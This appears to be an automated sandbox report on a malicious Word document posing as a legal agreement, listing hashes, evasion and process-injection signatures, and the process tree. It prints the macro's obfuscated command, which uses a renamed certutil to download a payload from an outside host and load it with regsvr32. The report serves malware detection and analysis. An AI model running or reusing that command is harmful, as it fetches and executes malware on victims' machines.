Analysis
-
max time kernel
139s -
max time network
128s -
platform
windows10_x64 -
resource
win10v200722 -
submitted
31-07-2020 13:03
Static task
static1
Behavioral task
behavioral1
Sample
legal agreement_07.30.2020.doc
Resource
win7v200722
Behavioral task
behavioral2
Sample
legal agreement_07.30.2020.doc
Resource
win10v200722
General
-
Target
legal agreement_07.30.2020.doc
-
Size
103KB
-
MD5
b3b0dffa00f1a93dd4f4069d87f43dd3
-
SHA1
756fe15d649645f5d9c3ef60dcd6d6ba5384633e
-
SHA256
e67aa7a4192ca035c6c52a6afaf1b03058b9baa6fde616db3dad9d8d3d4c24cc
-
SHA512
fe57b509a42cf017bc17d7b84d69ffb9c8de4e7240ef4056caf4e91fda39fee16b0019a4c6fba521f7278d99d857b9ef1374329177a70cc5b6ccc1bf44fd0202
Malware Config
Signatures
-
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
WINWORD.EXEcmd.exedescription pid process target process PID 3488 wrote to memory of 2636 3488 WINWORD.EXE cmd.exe PID 3488 wrote to memory of 2636 3488 WINWORD.EXE cmd.exe PID 2636 wrote to memory of 2700 2636 cmd.exe 1.exe PID 2636 wrote to memory of 2700 2636 cmd.exe 1.exe -
Executes dropped EXE 1 IoCs
Processes:
1.exepid process 2700 1.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious use of SetWindowsHookEx 19 IoCs
Processes:
WINWORD.EXEpid process 3488 WINWORD.EXE 3488 WINWORD.EXE 3488 WINWORD.EXE 3488 WINWORD.EXE 3488 WINWORD.EXE 3488 WINWORD.EXE 3488 WINWORD.EXE 3488 WINWORD.EXE 3488 WINWORD.EXE 3488 WINWORD.EXE 3488 WINWORD.EXE 3488 WINWORD.EXE 3488 WINWORD.EXE 3488 WINWORD.EXE 3488 WINWORD.EXE 3488 WINWORD.EXE 3488 WINWORD.EXE 3488 WINWORD.EXE 3488 WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 3488 WINWORD.EXE 3488 WINWORD.EXE -
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 2636 3488 cmd.exe WINWORD.EXE -
An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
Processes:
cmd.exepid process 2636 cmd.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\legal agreement_07.30.2020.doc" /o ""1⤵
- Suspicious use of WriteProcessMemory
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Suspicious behavior: AddClipboardFormatListener
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c "set u=url&&call C:\ProgramData\1.exe /%u%^c^a^c^h^e^ /f^ http://bofzvaxf6.com/bolb/jaent.php?l=liut1.cab C:\ProgramData\1.tmp && call regsvr32 C:\ProgramData\1.tmp"2⤵
- Suspicious use of WriteProcessMemory
- Process spawned unexpected child process
- An obfuscated cmd.exe command-line is typically used to evade detection.
-
C:\ProgramData\1.exeC:\ProgramData\1.exe /urlcache /f http://bofzvaxf6.com/bolb/jaent.php?l=liut1.cab C:\ProgramData\1.tmp3⤵
- Executes dropped EXE